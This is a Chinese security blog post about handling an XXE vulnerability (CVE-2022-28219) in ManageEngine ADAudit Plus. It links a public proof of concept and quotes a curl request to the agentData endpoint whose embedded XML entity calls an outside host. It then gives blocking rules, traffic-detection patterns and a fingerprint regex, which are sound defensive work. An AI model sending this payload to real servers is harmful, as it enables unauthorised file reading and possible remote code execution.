Zoho ManageEngine ADAudit Plus XXE漏洞(CVE-2022-28219)处置

admin 2022年8月4日10:17:12安全漏洞评论10 views974字阅读3分14秒阅读模式

Zoho ManageEngine ADAudit Plus XXE漏洞(CVE-2022-28219)处置

一、漏洞通告:

https://avd.aliyun.com/detail?id=AVD-2022-28219

Zoho ManageEngine ADAudit Plus 是美国Zoho Corporation公司的用于简化审计、证明合规性和检测威胁的一款产品。其7060版本之前 agentData 接口存在XXE漏洞,攻击者可在未授权的情况下利用XXE漏洞读取文件,甚至造成远程代码执行。


二、漏洞EXP/POC:

https://github.com/horizon3ai/CVE-2022-28219


三、漏洞分析:

CVE-2022-28219: Unauthenticated XXE to RCE and Domain Compromise in ManageEngine ADAudit Plus

https://www.horizon3.ai/red-team-blog-cve-2022-28219/

curl -X POST http://<adap_ip>:<port>/api/agent/tabs/agentData -d @payload.json{"DomainName""smoke.net",         "EventCode"4688,         "EventType"0,         "TimeGenerated"0,         "Task Content""<?xml version="1.0" encoding="UTF-8"?><! foo [ <!ENTITY % xxe SYSTEM "http://10.0.220.200"> %xxe; ]>"}

四、漏洞拦截:

path路径前缀是"/api/agent/tabs/agentData",拦截

请求参数包含"<!ENTITY"和"SYSTEM",拦截


五、攻击流量检测:

请求参数包含"<!ENTITY"和"SYSTEM"

path路径前缀是"/api/agent/tabs/agentData"或"/cewolf/"


六、应用指纹检测:

response.body:/.*.manageengine.com.*/


原文始发于微信公众号(xiaozhu佩奇学安全):Zoho ManageEngine ADAudit Plus XXE漏洞(CVE-2022-28219)处置

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年8月4日10:17:12
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  Zoho ManageEngine ADAudit Plus XXE漏洞(CVE-2022-28219)处置 http://cn-sec.com/archives/1220945.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: